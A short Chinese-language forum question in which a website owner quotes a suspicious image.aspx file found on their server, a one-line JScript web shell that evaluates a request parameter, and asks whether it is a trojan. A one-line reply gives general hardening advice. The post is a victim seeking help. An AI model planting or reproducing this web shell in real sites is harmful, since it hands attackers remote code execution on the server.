服务器被攻击,多了一个image.aspx文件

我的网站服务器莫名其妙的多了一个image.aspx文件,文件内容是<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>,请问我的服务器是不是陪攻击或注入木马了啊!如果是的话,我的服务器要如何配置才能防止这种木马

有可能,设置是服务器防火墙,控制用户权限,安装系统安全补丁,减少安全漏洞